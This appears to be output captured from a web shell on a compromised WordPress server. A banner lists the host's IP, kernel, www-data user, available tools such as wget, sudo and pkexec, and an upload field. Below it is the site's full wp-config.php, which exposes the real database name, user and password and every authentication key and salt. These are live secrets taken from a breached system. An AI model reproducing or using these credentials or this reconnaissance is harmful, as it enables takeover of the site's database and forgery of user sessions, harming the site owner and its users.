| Server IP : 104.237.150.88 / Your IP : 216.73.216.189 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ubuntu-us 5.15.0-185-generic #195-Ubuntu SMP Fri Jun 19 17:11:50 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.2-1ubuntu2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/ubuntu-california.org/htdocs/ |
Upload File : |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/documentation/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'ubuntucali' );
/** Database username */
define( 'DB_USER', 'ubuntucali' );
/** Database password */
define( 'DB_PASSWORD', 'noFah2ga' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'gvxhhp&TqIqeisz2_ciQT#&oAl+YCeEU[zt1E7ISfK?FxJC4)%7%sOQ^vG7+9I$U' );
define( 'SECURE_AUTH_KEY', '*4:7d8&[TqE%Q~::0QP(8(^ana/-Z#0(=w%_Ru}vOA&xD0;]UjU]$e`.SQSD76ND' );
define( 'LOGGED_IN_KEY', '_sD$@B?~.9&:*L$.~0u.hQv{q>U|-qn;Xtg >b}3V;9Q)W&A{z^#}-Aou>Zj>Fpz' );
define( 'NONCE_KEY', 'mUnc|a8^tjj}Hl(|tlw@M?4.}El&A@eng1G[kyye[tDg%>:zrc|_`Ot2GBzG#RGe' );
define( 'AUTH_SALT', 'HF+G3A*0k>MO!9|0$A5dXMY{=xE1rjA70 !7Q6{53dpA9VmM~R2(X~qfGw;s:/Ek' );
define( 'SECURE_AUTH_SALT', '`PLUt3w*~ZQ(HbUMM{TO_Rh= 0$r,qmde8x137e3]!&@69`cx%$Z2*0S@UaIC19@' );
define( 'LOGGED_IN_SALT', '+x>$,~r/N_]r-;Kdx*Rcr.=,rz|wm^`]CJHioT2Vwxq3=c)M]X_1Ki%B2op)?33v' );
define( 'NONCE_SALT', 'w<-Sni-OlOIc#/^iPg V(*Qk|A_RR?mq07ygXBk4YyjZR?^AmAnY-4,t]ns/+|^|' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/documentation/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';